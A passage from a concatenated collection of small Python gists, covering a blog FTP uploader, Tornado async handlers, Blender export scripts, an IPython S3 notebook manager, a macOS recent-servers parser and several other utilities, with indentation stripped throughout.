text = text.decode(encoding or 'ascii')
clean_text = text.strip().replace(' ', '-').lower()
while '--' in clean_text:
clean_text = clean_text.replace('--','-')
ascii_text = normalize('NFKD', clean_text).encode('ascii', 'ignore')
strict_text = map(lambda x: x if x in permitted_chars else '', ascii_text)
return ''.join(strict_text)
# David's code to resize your clipboard image
def customSize(img):
w, h = img.size
print 'w: ' + str(w)
print 'h: '+ str(h)
if w > 600:
wsize = 600/float(w)
print 'wsize: '+str(wsize)
hsize = int(float(h)*float(wsize))
print 'hsize: ' + str(hsize)
img = img.resize((600, hsize), Image.ANTIALIAS)
return img
# Nothing to see here. Just the fun stuff coming together.
image = customSize(image)
print image.size
image.show()
print title + " (" + status + ")"
print words
imgBuffer = BytesIO()
image.save(imgBuffer, 'png')
imgBuffer.seek(0)
folders = get_folders()
# I decided to stop at 3 folders in the assets directory. I only have 2
# and more than 3 seemed like the exception not the rule so I got lazy.
if len(folders) == 1:
folder_slug = 1
elif len(folders) == 2:
folder_slug = console.alert("Category","Choose image folder",folders[0][2].title(),folders[1][2].title())
elif len(folders) == 3:
folder_slug = console.alert("Category","Choose image folder",folders[0][2].title(),folders[1][2].title(),folders[2][2].title())
imgRemoteFilePath = imgRemotePath + folders[folder_slug-1][2] + "/"
txtRemoteFilePath = txtRemotePath + folders[folder_slug-1][1] + "/"
# My site uses the _entry_timestamps variable
# set to true so you may need to modify the
# date format below
title_slug = slug(title)
txtFileName = today.strftime("%Y-%m-%d-%H%M") +'_'+ title_slug +'.md'
fileURL = urllib.quote(imgFileName)
imageLink = imgRemoteFilePath+fileURL
imgMarkdownFilePath = imgBase + folders[folder_slug-1][2] + "/" + fileURL
# Told you it was way down here. These '$y' keys and their corresponding
# values need to match whatever you have listed at the top in the
# 'template' variable
values = {
"yTitle" : title,
"yTemplate" : post_template_name,
"yAuthor" : author,
"yCategories" : category,
"yStatus" : status,
"yPhotos" : imgMarkdownFilePath,
"yContent" : words
}
txtData = make_file(template,values)
txtBuffer = cStringIO.StringIO()
txtBuffer.write(txtData)
txtBuffer.seek(0)
# Doing some uploading here.
try:
console.show_activity()
ftp.cwd(imgRemoteFilePath)
ftp.storbinary('STOR '+imgFileName, imgBuffer)
console.hide_activity()
except Exception as e:
print "Unable save image file"
try:
console.show_activity()
ftp.cwd(txtRemoteFilePath)
ftp.storbinary('STOR '+txtFileName, txtBuffer)
console.hide_activity()
except Exception as e:
print "Unable save article file"
ftp.quit()
print "\n=================\nFinished"
```
#### File: hard-gists/4587049/snippet.py
```python
from pandas import np
from pandas.io.data import DataReader
def historical_volatility(sym, days):
"Return the annualized stddev of daily log returns of `sym`."
try:
quotes = DataReader(sym, 'yahoo')['Close'][-days:]
except Exception, e:
print "Error getting data for symbol '{}'.\n".format(sym), e
return None, None
logreturns = np.log(quotes / quotes.shift(1))
return np.sqrt(252*logreturns.var())
if __name__ == "__main__":
print historical_volatility('GOOG', 30)
```
#### File: hard-gists/4594879/snippet.py
```python
from concurrent.futures import ThreadPoolExecutor
from functools import partial, wraps
import time
import tornado.ioloop
import tornado.web
EXECUTOR = ThreadPoolExecutor(max_workers=4)
def unblock(f):
@tornado.web.asynchronous
@wraps(f)
def wrapper(*args, **kwargs):
self = args[0]
def callback(future):
self.write(future.result())
self.finish()
EXECUTOR.submit(
partial(f, *args, **kwargs)
).add_done_callback(
lambda future: tornado.ioloop.IOLoop.instance().add_callback(
partial(callback, future)))
return wrapper
class MainHandler(tornado.web.RequestHandler):
def get(self):
self.write("Hello, world %s" % time.time())
class SleepHandler(tornado.web.RequestHandler):
@unblock
def get(self, n):
time.sleep(float(n))
return "Awake! %s" % time.time()
class SleepAsyncHandler(tornado.web.RequestHandler):
@tornado.web.asynchronous
def get(self, n):
def callback(future):
self.write(future.result())
self.finish()
EXECUTOR.submit(
partial(self.get_, n)
).add_done_callback(
lambda future: tornado.ioloop.IOLoop.instance().add_callback(
partial(callback, future)))
def get_(self, n):
time.sleep(float(n))
return "Awake! %s" % time.time()
application = tornado.web.Application([
(r"/", MainHandler),
(r"/sleep/(\d+)", SleepHandler),
(r"/sleep_async/(\d+)", SleepAsyncHandler),
])
if __name__ == "__main__":
application.listen(8888)
tornado.ioloop.IOLoop.instance().start()
```
#### File: hard-gists/45c1c820a8fa67d8e17e3079d6aa2a65/snippet.py
```python
import click
import torch
import torch.autograd
import torch.nn.functional as F
from torch.autograd import Variable
import os
import random
import math
from bisect import bisect_left
url_to_english_words = \
'https://raw.githubusercontent.com/dwyl/english-words/master/words.txt'
def get_english_words():
if not os.path.isfile('words.txt'):
import subprocess
subprocess.call(['wget', url_to_english_words])
with open('words.txt') as f:
english_words = []
for line in f:
english_words.append(line.strip())
return english_words
def exponential_distribution(lambda_=1.0):
u = random.random()
x = - math.log(u) / lambda_
return x
def sorted_numbers(N=1000):
# TODO: more complicated list
numbers = [exponential_distribution() for _ in range(N)]
numbers = sorted(numbers)
def random_fun():
x = random.choice(numbers)
y = numbers.index(x)
return x, y
return numbers, random_fun
def sorted_hash_map(N=1000):
# ignore the map for now, just get random hashes
english_words = get_english_words()
english_words = english_words[:N]
hashes = [hash(word) for word in english_words]
hashes = sorted(hashes) # pseudo hash map
def random_fun():
index = random.randint(0, N - 1)
word = english_words[index]
hash_ = hashes[index]
return word, index
return hashes, random_fun
def get_model(dim=128):
model = torch.nn.Sequential(
torch.nn.Linear(1, dim),
torch.nn.ReLU(),
torch.nn.Linear(dim, 1),
)
return model
def _featurize(x):
return torch.unsqueeze(Variable(torch.Tensor(x)), 1)
def naive_index_search(x, numbers):
for idx, n in enumerate(numbers):
if n > x:
break
return idx - 1
def bisect_search(x, numbers):
i = bisect_left(numbers, x)
if i:
return i - 1
raise ValueError
@click.command()
@click.argument('mode', type=click.Choice(['ranged', 'hash', 'bloom']))
@click.option('--n', default=1000, type=int,
help='Size of sorted array.')
@click.option('--lr', default=9e-3, type=float,
help='Learning rate of DL model (only parameter that matters!)')
def main(mode, n, lr):
"""CLI for creating machine learned index.
"""
N = n
if mode == 'ranged':
numbers, random_fun = sorted_numbers(N)
elif mode == 'hash':
raise NotImplementedError
elif mode == 'bloom':
raise NotImplementedError
model = get_model()
optimizer = torch.optim.Adam(model.parameters(), lr=lr)
try:
while True:
batch_x = []; batch_y = []
for _ in range(32):
x, y = random_fun()
batch_x.append(x)
batch_y.append(y)
batch_x = _featurize(batch_x)
batch_y = _featurize(batch_y)
pred = model(batch_x) * N
output = F.smooth_l1_loss(pred, batch_y)
loss = output.data[0]
print(loss)
optimizer.zero_grad()
output.backward()
optimizer.step()
except KeyboardInterrupt:
pass
def _test(x):
pred = model(_featurize([x])) * N
# idx = naive_index_search(x, numbers)
idx = bisect_search(x, numbers)
print('Real:', idx, 'Predicted:', float(pred.data[0]))
_test(1.5)
import pdb
pdb.set_trace()
if __name__ == '__main__':
main()
```
#### File: hard-gists/4636851/snippet.py
```python
import bpy
from bpy_extras import keyconfig_utils
import sys
# Dump Blender keyconfig as HTML.
# How to use
# 1. Open this file in Blender's Text Editor.
# 2. Do "Run Script".
# 3. New Text "keyconfigs.html" will be added.
# save it somewhere and open in web browser (recommends Safari, Chrome or Firefox).
#
# JSON format
# [keyconfig0, keyconfig1, ...]
# keyconfig := {name:"name", keymap:[keymap0, keymap1, ...]}
# keymap := {name:"name", item:[item0, item1, ...]}
# item := {name:"name", modifier_keys:["like 'Ctrl' or empty", ...], key:"key", propvalue:"value"}
html1 = """<html><head>
<script>
"""
html2 = """
function init() {
var tabul = document.getElementById('tabs');
var tablecon = document.getElementById('tables');
var contents = [];
var createTabAction = function (tabindex) {
return function () {
for(var i = 0; i < contents.length; i++) {
var tmp = contents[i];
if(i == tabindex) {
tmp.tab.className = 'selected';
tmp.table.style.display = 'block';
} else {
tmp.tab.className = '';
tmp.table.style.display = 'none';
}
}
};
};
for(var i = 0; i < bl_keyconfs.length; i++) {
var kc = bl_keyconfs[i];
// create tab
var tabelm = document.createElement('li');
tabelm.className = 'tab';
tabelm.innerHTML = kc.name;
tabul.appendChild(tabelm);
tabelm.addEventListener('click', createTabAction(i));
// create table
var tablegroup = document.createElement('div');
tablecon.appendChild(tablegroup);
for(var ikm = 0; ikm < kc.keymaps.length; ikm++) {
var km = kc.keymaps[ikm];
var keytatble = document.createElement('table');
tablegroup.appendChild(keytatble);
var caption = document.createElement('caption');
caption.innerHTML = km.name;
keytatble.appendChild(caption);
for(var iki = 0; iki < km.items.length; iki++) {
var ki = km.items[iki];
var tr = document.createElement('tr');
keytatble.appendChild(tr);
// action description
var td;
td = document.createElement('td');
td.style.width = '35%';
td.innerHTML = (ki.name.length > 0)? ki.name : '-';
tr.appendChild(td);
// key
td = document.createElement('td');
td.style.width = '35%';
var modkey = "";
for(var imod = 0; imod < ki.modifier_keys.length; imod++) {
modkey += ki.modifier_keys[imod] + ' + ';
}
td.innerHTML = modkey + ki.key;
tr.appendChild(td);
// misc
td = document.createElement('td');
td.innerHTML = (ki.propvalue.length > 0)? ki.propvalue : '-';
tr.appendChild(td);
}
}
contents.push({'tab':tabelm, 'table':tablegroup})
}
(createTabAction(0))();
}
window.addEventListener('load', init);
</script>
<style>
table {
margin-top: 2ex;
width: 100%;
border-collapse: collapse;
}
td {
margin: 0;
padding: 4px 8px 4px 8px;
border: 1px solid #000;
}
caption {
text-align: left;
font-size: 120%;
font-weight: bold;
}
.tablewrapper {
padding: 4px;
border: 1px solid #000;
border-top-width: 0;
position: relatie;
display: block;
}
.tablegroup {
padding: 0;
margin: 0;
}
.tabul {
list-style: none;
margin: 0;
padding: 0;
position:relative;
}
.tabul:after {
position: absolute;
content: "";
width: 100%;
bottom: 0;
left: 0;
border-bottom: 1px solid #000;
z-index: 1;
}
.tabul li {
background: #ccc;
color: #000;
position: relative;
margin: 0 1px 0 0;
padding: 4px 10px;
border: 1px solid #000;
display: inline-block;
z-index: 0;
}
.tabul li.selected {
background: #fff;
color: #000;
border-bottom-color: #fff;
z-index: 2;
}
</style>
</head>
<body>
<h1>Blender Key Configs</h1>
<div id="conf">
<ul class="tabul" id="tabs"></ul>
<div class="tablewrapper" id="tables"></div>
</div>
</body>
</html>
"""
def create_keymapitem_json(ki):
modkeys = []
if ki.any:
modkeys.append('Any')
else:
if ki.ctrl:
modkeys.append('Ctrl')
if ki.alt:
modkeys.append('Alt')
if ki.shift:
modkeys.append('Shift')
if ki.oskey:
#modkeys.append('OSkey')
modkeys.append('Cmd')
if ki.key_modifier != 'NONE':
modkeys.append(ki.key_modifier)
json = '{{"name":"{}",'.format(ki.name)
if len(modkeys) > 0:
json += '"modifier_keys":["{}"]'.format('","'.join(modkeys))
else:
json += '"modifier_keys":[]'
json += ',"key":"{}"'.format(ki.type)
if ki.propvalue != 'NONE':
json += ',"propvalue":"{}"'.format(ki.propvalue)
else:
json += ',"propvalue":""'
json += '}'
return json
def create_keymap_json(kc):
json = '{{"name":"{}","items":['.format(kc.name)
for i, ki in enumerate(kc.keymap_items):
if i > 0: json += ','
json += create_keymapitem_json(ki)
json += '\n'
json += ']}'
return json
def create_keyconfig_json(kc):
json = '{{"name":"{}","keymaps":['.format(kc.name)
for i, km in enumerate(kc.keymaps):
if i > 0: json += ','
json += create_keymap_json(km)
json += '\n'
json += ']}'
return json
wm = bpy.context.window_manager
#kc = wm.keyconfigs.default
#kc = wm.keyconfigs.addon
#kc = wm.keyconfigs.user
#kc = wm.keyconfigs.active
#keyconfig_utils.keyconfig_export(wm, kc, "./keys.txt")
keyconfs = []
for kc in wm.keyconfigs:
keyconfs.append(create_keyconfig_json(kc))
kcjson = 'var bl_keyconfs=[' + ','.join(keyconfs) + '];'
#print(kcjson)
#f = open('./keys.js', 'w')
#f.write(kcjson)
#f.close()
#print("write to file. done");
exist_texts = set(i.name for i in bpy.data.texts)
bpy.ops.text.new()
cur_texts = set(i.name for i in bpy.data.texts)
added_texts = cur_texts - exist_texts
newtext = bpy.data.texts[added_texts.pop()]
newtext.name = 'keyconfigs.html'
newtext.from_string(html1 + kcjson + html2)
```
#### File: hard-gists/4654376/snippet.py
```python
class ClassPathHacker :
##########################################################
# from http://forum.java.sun.com/thread.jspa?threadID=300557
#
# Author: <NAME> 2007 translated the above Java to this
# Jython class
# Modified by: <NAME> <EMAIL>
# Purpose: Allow runtime additions of new Class/jars either from
# local files or URL
######################################################
import java.lang.reflect.Method
import java.io.File
import java.net.URL
import java.net.URLClassLoader
import jarray
import java
def addFile (self, s):
#############################################
# Purpose: If adding a file/jar call this first
# with s = path_to_jar
#############################################
# make a URL out of 's'
f = self.java.io.File (s)
u = f.toURL ()
a = self.addURL (u)
return a
def addURL (self, u):
##################################
# Purpose: Call this with u= URL for
# the new Class/jar to be loaded
#################################
sysloader = self.java.lang.ClassLoader.getSystemClassLoader()
sysclass = self.java.net.URLClassLoader
method = sysclass.getDeclaredMethod("addURL", [self.java.net.URL]) #parameters.toArray())
a = method.setAccessible(1)
jar_a = self.jarray.array([u], self.java.lang.Object)
b = method.invoke(sysloader, [u])
return u
if __name__=="__main__":
from java.lang import *
jarloader=ClassPathHacker()
jarloader.addFile(r'./mysql-connector-java-5.1.21.jar')
Class.forName("com.mysql.jdbc.Driver")
import sys
#sys.path+=[r'./mysql-connector-java-5.1.21.jar'] # unnecessary
import com.mysql.jdbc.Driver
```
#### File: hard-gists/4760272/snippet.py
```python
import datetime
import boto
from boto.s3.key import Key
from boto.s3.connection import S3Connection
from tornado import web
from .nbmanager import NotebookManager
from IPython.nbformat import current
from IPython.utils.traitlets import Unicode, Instance
#-----------------------------------------------------------------------------
# Classes
#-----------------------------------------------------------------------------
class S3NotebookManager(NotebookManager):
aws_access_key_id = Unicode('', config=True, help='AWS access key.')
aws_secret_access_key = Unicode('', config=True, help='AWS S3 storage account key.')
bucket = Unicode('', config=True, help='Bucket name for notebooks.')
meta_nbname = "nbname"
def __init__(self, **kwargs):
super(S3NotebookManager, self).__init__(**kwargs)
self.__s3_conn = None
self.log_info()
# Form unique bucket using access key + bucket name
# Wanted to add access_key to this but lower() isn't working
self.__bucket_name = self.bucket
self.__create_container()
@property
def s3_conn(self):
"""Lazy initialize"""
if not self.__s3_conn:
self.__s3_conn = S3Connection(aws_access_key_id = self.aws_access_key_id,
aws_secret_access_key = self.aws_secret_access_key)
return self.__s3_conn
def __create_container(self):
if not self.s3_conn.lookup(self.__bucket_name):
self.s3_conn.create_bucket(self.__bucket_name)
def load_notebook_names(self):
"""On startup load the notebook ids and names from S3
"""
self.mapping = {}
bucket = self.s3_conn.get_bucket(self.__bucket_name)
for item in bucket:
id_ = item.name
# bug in boto doesn't load metadata
# Force metadata load with get_key
item = bucket.get_key(id_)
name = item.get_metadata(self.meta_nbname)
if name:
self.mapping[id_] = name
else:
self.log.info(name)
self.log.info(item.metadata)
self.log.info("Skipping over S3 file with no ipython name: %s" % (id_,))
def list_notebooks(self):
"""List all notebooks in the container.
This version uses `self.mapping` as the authoritative notebook list.
"""
try:
data = [dict(notebook_id=item[0],name=item[1]) for item in self.mapping.items()]
data = sorted(data, key=lambda item: item['name'])
except Exception as e:
self.log.info("Problem sorting, this is the mapping: %s" % (self.mapping.items()))
raise
return data
def read_notebook_object(self, notebook_id):
"""Get the object representation of a notebook by notebook_id."""
if not self.notebook_exists(notebook_id):
raise web.HTTPError(404, u'Notebook does not exist: %s' % notebook_id)
try:
# v1 and v2 and json in the .ipynb files.
bucket = self.s3_conn.get_bucket(self.__bucket_name)
k = Key(bucket)
k.key = notebook_id
data = k.get_contents_as_string()
#self.log.info("downloaded contents: %s" % (data,))
except:
raise web.HTTPError(500, u'Couldn\'t pull out of s3.')
try:
nb = current.reads(data, u'json')
except:
raise web.HTTPError(500, u'Unreadable JSON notebook.')
# Todo: The last modified should actually be saved in the notebook document.
# We are just using the current datetime until that is implemented.
last_modified = datetime.datetime.utcnow()
return last_modified, nb
def write_notebook_object(self, nb, notebook_id=None):
"""Save an existing notebook object by notebook_id."""
try:
new_name = nb.metadata.name
except AttributeError:
raise web.HTTPError(400, u'Missing notebook name')
if notebook_id is None:
notebook_id = self.new_notebook_id(new_name)
if notebook_id not in self.mapping:
raise web.HTTPError(404, u'Notebook does not exist: %s' % notebook_id)
try:
data = current.writes(nb, u'json')
except Exception as e:
raise web.HTTPError(400, u'Unexpected error while saving notebook: %s' % e)
try:
bucket = self.s3_conn.get_bucket(self.__bucket_name)
key = Key(bucket)
key.key = notebook_id
key.set_metadata(self.meta_nbname, new_name)
#self.log.info("Setting contents to: %s" % (data,))
key.set_contents_from_string(data)
except Exception as e:
raise web.HTTPError(400, u'Unexpected error while saving notebook: %s' % e)
self.mapping[notebook_id] = new_name
return notebook_id
def delete_notebook(self, notebook_id):
"""Delete notebook by notebook_id."""
if not self.notebook_exists(notebook_id):
raise web.HTTPError(404, u'Notebook does not exist: %s' % notebook_id)
try:
bucket = self.s3_conn.get_bucket(self.__bucket_name)
k = Key(bucket)
k.key = notebook_id
k.delete()
except Exception as e:
raise web.HTTPError(400, u'Unexpected error while deleting notebook: %s' % e)
else:
self.delete_notebook_id(notebook_id)
def log_info(self):
self.log.info("Serving notebooks from S3 storage: %s, %s", self.aws_access_key_id, self.bucket)
```
#### File: hard-gists/4776b4b2075bf9b7e512/snippet.py
```python
from Foundation import NSKeyedUnarchiver
from struct import unpack
# This entire function is black magic of the highest order and I'll blog about it later
def extract_share(bookmark_data):
content_offset, = unpack('I', bookmark_data[12:16])
first_TOC, = unpack('I', bookmark_data[content_offset:content_offset+4])
first_TOC += content_offset
TOC_len, rec_type, level, next_TOC, record_count = unpack('IIIII', bookmark_data[first_TOC:first_TOC+20])
TOC_cursor = first_TOC + 20
record_offsets = {}
for i in range(record_count):
record_id, offset = unpack('<IQ', bookmark_data[TOC_cursor:TOC_cursor+12])
record_offsets[record_id] = offset + content_offset
TOC_cursor += 12
mount_record = record_offsets.get(0x2050, None)
# Check to see if we actually had a volMountURL record
if mount_record is not None:
mount_length, rec_type = unpack('II', bookmark_data[mount_record:mount_record+8])
mount_record += 8
mount_URL = (bookmark_data[mount_record:mount_record+mount_length]).decode('utf-8')
return mount_URL
else:
return None
def get_recentservers(sfl_file_path):
# Read the com.apple.LSSharedFileList.RecentServers.sfl file (located in ~/Library/Application Support/com.apple.sharedfilelist on 10.11+)
with open(sfl_file_path, 'rb') as f:
raw_data = f.read()
# It's NSKeyedArchiver data - let's decode it!
recent_servers = NSKeyedUnarchiver.unarchiveObjectWithData_(buffer(raw_data))
# Build an empty set
server_URLs = []
# Add in our discovered server URLs from the SFLListItems and return in 'SFLListItem.order' order
for x in sorted(recent_servers['items'], lambda y,_: int(y.order())):
url = extract_share(x.bookmark()[:].tobytes())
if url is not None:
server_URLs.append(url)
return server_URLs
# Example usage:
# get_recentservers('com.apple.LSSharedFileList.RecentServers.sfl')
```
#### File: hard-gists/478f9ba38afb1bf5f5613bfe46eb82ce/snippet.py
```python
from random import choice
from string import ascii_lowercase, ascii_uppercase, digits
from tkinter import Tk, Entry, Button, StringVar
def random_string(length):
return ''.join(choice(ascii_lowercase + digits + ascii_uppercase) for i in range(length))
root = Tk()
root.title('32 chars random string generator')
var = StringVar()
var.set(random_string(32))
entry = Entry(root, width=40, justify='center', textvariable=var)
entry.pack(padx=5, pady=5)
def copy_callback():
root.clipboard_clear()
root.clipboard_append(var.get())
def gen_callback():
var.set(random_string(32))
button_generate = Button(root, text="Generate", command=gen_callback)
button_generate.pack(padx=5, pady=5)
button_copy = Button(root, text="Copy to clipboard", command=copy_callback)
button_copy.pack(padx=5, pady=5)
root.mainloop()
```
#### File: hard-gists/4961824/snippet.py
```python
import tkinter
from time import strftime
#by <NAME>
clock = tkinter.Label()
clock.pack()
clock['font'] = 'Helvetica 120 bold'
clock['text'] = strftime('%H:%M:%S')
def tictac():
agora = strftime('%H:%M:%S')
if agora != clock['text']:
clock['text'] = agora
clock.after(100, tictac)
tictac()
clock.mainloop()
```
#### File: hard-gists/4995164/snippet.py
```python
from django.core.exceptions import ImproperlyConfigured
from django.core.management import call_command
from django.db.models.signals import post_syncdb
from south.models import MigrationHistory
import pizzanuvola_teaser.settings as settings
def migration_exists(appname, migrationnumber):
appname = appname.split('.')[-1]
return MigrationHistory.objects.filter(app_name=appname, migration__icontains=migrationnumber).exists()
def load_data(app, sender, **kwargs):
if app.__name__ == settings.INSTALLED_APPS[-1] + ".models":
migrations = {
'allauth.socialaccount': [
'0001',
'0002',
'0003',
'0004',
'0005',
'0006',
'0007',
'0008',
],
'allauth.socialaccount.providers.facebook': [
'0001',
'0002',
],
}
for appname, migrationlist in migrations.iteritems():
for migration in migrationlist:
if not migration_exists(appname, migration):
try:
call_command('migrate', appname, migration)
except ImproperlyConfigured:
pass
post_syncdb.connect(load_data)
```
#### File: hard-gists/4996449/snippet.py
```python
import urllib2
import json
from supervisor import childutils
import sys
import socket
class PagerDutyNotifier(object):
def __init__(self, pd_service_key):
self.pd_service_key = pd_service_key
def run(self):
while True:
headers, payload = childutils.listener.wait()
sys.stderr.write(str(headers) + '\n')
payload = dict(v.split(':') for v in payload.split(' '))
sys.stderr.write(str(payload) + '\n')
if headers['eventname'] == 'PROCESS_STATE_EXITED' and not int(payload['expected']):
data = {'service_key': self.pd_service_key,
'event_type': 'trigger',
'description': '{} service has crashed unexpectedly on {}'.format(payload['processname'], socket.gethostname())
}
try:
res = urllib2.urlopen('https://events.pagerduty.com/generic/2010-04-15/create_event.json', json.dumps(data))
except urllib2.HTTPError, ex:
sys.stderr.write('{} - {}\n{}'.format(ex.code, ex.reason, ex.read()))
else:
sys.stderr.write('{}, {}\n'.format(res.code, res.msg))
childutils.listener.ok()
sys.stderr.flush()
if __name__ == '__main__':
pager_duty_service_key = sys.argv[1]
pager_duty_notifer = PagerDutyNotifier(pager_duty_service_key)
pager_duty_notifer.run()
```
#### File: hard-gists/4a07818b8a21dd5c49013b9ed496cb70/snippet.py
```python
import bpy
myCurve = bpy.data.curves[0] # here your curve
spline= myCurve.splines[0] # maybe you need a loop if more than 1 spline
scale = 200
curvepath_template = """
var curves = new THREE.CurvePath();
%s
var geometry = curves.createSpacedPointsGeometry(100);
var material = new THREE.LineBasicMaterial({
color: 0xff0000
});
// Create the final Object3d to add to the scene
var curveObject = new THREE.Line(geometry, material);"""
curve_template = """\ncurves.add(new THREE.CubicBezierCurve3(%s\n));"""
vector3_template = """\n new THREE.Vector3( %f, %f, %f ),"""
def makecurve(*vectors):
vector3_string = ''
for vector in vectors:
vector3_string = vector3_string + vector3_template % (
vector[0]*scale,
vector[1]*scale,
vector[2]*scale)
return vector3_string
curves = []
for x in range(len(spline.bezier_points)):
curves.append(curve_template % makecurve(spline.bezier_points[x].co
,spline.bezier_points[x].handle_right
,spline.bezier_points[x+1].handle_left
,spline.bezier_points[x+1].co)[:-1])
output = curvepath_template % ''.join(curves)
print(output)
```
#### File: hard-gists/4a4e7e700c34c04160b93aa03a14861c/snippet.py
```python
from __future__ import division
import numpy as np
import scipy.optimize
def multiclass_update(A, w, j):
"""Given matrix A in R^{k x d}), w in R^d) and j, find B that solves:
min_B ||B-A||^2 st (w B)_j >= (w B)_i + 1 for all i != j
observe that any change will be in the direction of x
so compute scalars:
C_i = [ a_i - a_j + 1 ] / ||x||^2
where a_i is x*A[i,:]
"""
k, d = A.shape
a = A.dot(w)
C = (a - a[j] + 1) / w.dot(w)
C[j] = 0
delta = min_delta(C, j)
return A + delta.reshape((k,1)).dot(w.reshape(1, d))
def slow(A, w, j):
# Here's a slow version of the same problem, which uses a less-efficient
# numerical method to find the solution.
# min_B ||B-A||^2 st (w B)_j >= (w B)_i + 1 for all i != j
[k, d] = A.shape
def f(x):
B = x.reshape((k,d))
D = (B - A).flatten()
return 0.5*D.dot(D), D
def h(x):
# inequality constraints
B = x.reshape((k,d))
s = B.dot(w)
H = (s[j] - s - 1)
H[j] = 0
return H
# precompute Jacobian of constraints
J = np.zeros((k,d,k))
for i in range(k):
if i != j:
J[i,:,i] -= w
J[j,:,i] += w
J = J.reshape((k*d,k)).T
def h_jac(_):
return J
if 0:
from arsenal.math import spherical, compare
x = A.flatten()
eps = 1e-5
m = 100
fd = np.zeros(m)
ad = np.zeros(m)
for t in range(m):
y = spherical(k*d)
z = spherical(k)
fd[t] = (h(x + eps*y).dot(z) - h(x - eps*y).dot(z)) / (2*eps)
ad[t] = y.dot((h_jac(x).T.dot(z)).flatten())
compare(fd, ad).show()
return scipy.optimize.minimize(f, x0 = A, jac=1,
constraints={'type': 'ineq', 'fun': h, 'jac': h_jac}).x
def min_delta(C, j):
# solve:
# min_delta sum_i delta_i^2 st delta_j >= delta_i + C_i for i != j
# do a change of variables where
# z = delta + D
# then we want to solve
# min_x ||x-z|| st x_j >= x_i for i != j
# after reordering C so that D[0] = C[j] and D[1:] is sorted(C[!j])
# and then need to un-sort the results
order = (-C).argsort()
j_idx = (order == j).nonzero()[0][0]
order2 = np.concatenate([[j], order[:j_idx], order[j_idx+1:]])
proj = column_squishing(C[order2], False)
return proj[order2.argsort()] - C
def column_squishing(z, do_proj=True):
# input: z has z_2 >= z_3 >= z_4 >= ... >= z_n
# returns the projection of z into { x in R : 0 <= x_i <= x_1 <= 1 }
# this is algorithm 5 from:
# Factoring nonnegative matrices with linear programs
# by <NAME> al., June 2012
# http://pages.cs.wisc.edu/~brecht/papers/12.Bit.EtAl.HOTT.pdf
proj01 = (lambda a: max(0, min(1, a))) if do_proj else (lambda a: a)
proj0_ = (lambda a: max(0, a)) if do_proj else (lambda a: a)
n = z.shape[0]
assert len(z.shape) == 1
assert all([z[i] >= z[i+1] for i in xrange(1, n-1)])
mu = z[0]
kc = n-1
for k in range(1, n):
if z[k] <= proj01(mu):
kc = k - 1
break
mu = mu * k / (k+1) + z[k] / (k+1)
x = np.zeros(n) + proj01(mu)
for k in range(kc+1, n):
x[k] = proj0_(z[k])
return x
import seaborn
import pandas as pd
import pylab as pl
from arsenal.timer import timers
from arsenal import iterview
from arsenal.math import assert_equal
def main():
T = timers()
R = 10 # repetitions
ks = range(3, 120, 10) * R
np.random.shuffle(ks)
for k in iterview(ks):
i = np.random.randint(k)
d = 5
A = np.random.randn(k,d)
w = np.random.randn(d)
with T['fast'](k=k):
a = multiclass_update(A, w, i)
with T['slow'](k=k):
b = slow(A, w, i)
assert_equal(a.flatten(), b.flatten())
s = a.dot(w)
assert s.argmax() == i # `i` should win.
s = np.sort(s)
margin = s[-1] - s[-2]
assert margin >= 0.99999
T.plot_feature('k', show='scatter')
pl.show()
if __name__ == '__main__':
main()
```
#### File: hard-gists/4aed548e606f11971f5a/snippet.py
```python
from rest_framework import status
from rest_framework.authtoken.models import Token
from rest_framework.authtoken.views import ObtainAuthToken
from rest_framework.generics import ListAPIView
from rest_framework.response import Response
from rest_framework.reverse import reverse
from rest_framework.settings import api_settings
from social.apps.django_app.utils import strategy
from social.backends.oauth import BaseOAuth1, BaseOAuth2
from api.serializers.social_login import ObtainSocialAuthTokenSerializer
@strategy()
def _register_by_access_token(request, backend):
"""
Checks what OAuth protocol is being used for social authentication, backend corresponds to the allowed backend types
and authenticates the user using the access token from the request.
"""
backend = request.strategy.backend
if isinstance(backend, BaseOAuth1):
token = {
'oauth_token': request.POST.get('access_token'),
'oauth_token_secret': '<secret>' # required by python-social-auth, but is not used
}
elif isinstance(backend, BaseOAuth2):
token = request.POST.get('access_token')
else:
raise Response("Wrong backend type", status=status.HTTP_400_BAD_REQUEST)
return backend.do_auth(token)
class ObtainSocialAuthTokenView(ObtainAuthToken):
serializer_class = ObtainSocialAuthTokenSerializer
renderer_classes = api_settings.DEFAULT_RENDERER_CLASSES
parser_classes = api_settings.DEFAULT_PARSER_CLASSES
class Meta():
list_wrapper = "tokens"
instance_wrapper = "token"
def post(self, request, backend):
serializer = self.serializer_class(data=request.DATA)
if serializer.is_valid():
user = _register_by_access_token(request, backend)
if user:
user_url = reverse('user-instance', args=[user.pk], request=request)
token, created = Token.objects.get_or_create(user=user)
return Response({'token': token.key, 'user_id': user.id, 'user_url': user_url})
return Response(serializer.errors, status.HTTP_400_BAD_REQUEST)
```
#### File: hard-gists/4b5afb297b4b7c835e6f/snippet.py
```python
from PIL import Image, ImageDraw
import sys
def pix_in_char(c):
size = (10,10)
im = Image.new('RGB', size)
draw = ImageDraw.Draw(im)
white = (255,255,255)
text_pos = (0,0)
draw.text(text_pos, c+c, fill=white)
del draw
pix = im.load()
cid = 0
for x in range(10):
for y in range(10):
cid = cid if pix[x,y][0]==0 else cid + y
return cid
pix_in_char_table = {}
for i in range(255):
character = chr(i)
pix_count = pix_in_char(character)
pix_in_char_table[pix_count] = character
pix_in_char_table[pix_count] = " "
keys = sorted(list(pix_in_char_table.keys()))
base = int(255/len(pix_in_char_table))
if len(sys.argv)!=2:
print("Need image name only.")
exit()
image_name = sys.argv[1]
output_name = image_name.split(".")[0] + "__image_2_ascii__.txt"
im = Image.open(image_name)
pix = im.load()
image_text = ""
for y in range(im.size[1]):
for x in range(im.size[0]):
clr = int(sum(pix[x,y])/4)
image_text += pix_in_char_table[keys[int(clr/base)]]*2
image_text += "\n"
open(output_name, "w").write(image_text)
"""
yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy
yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy
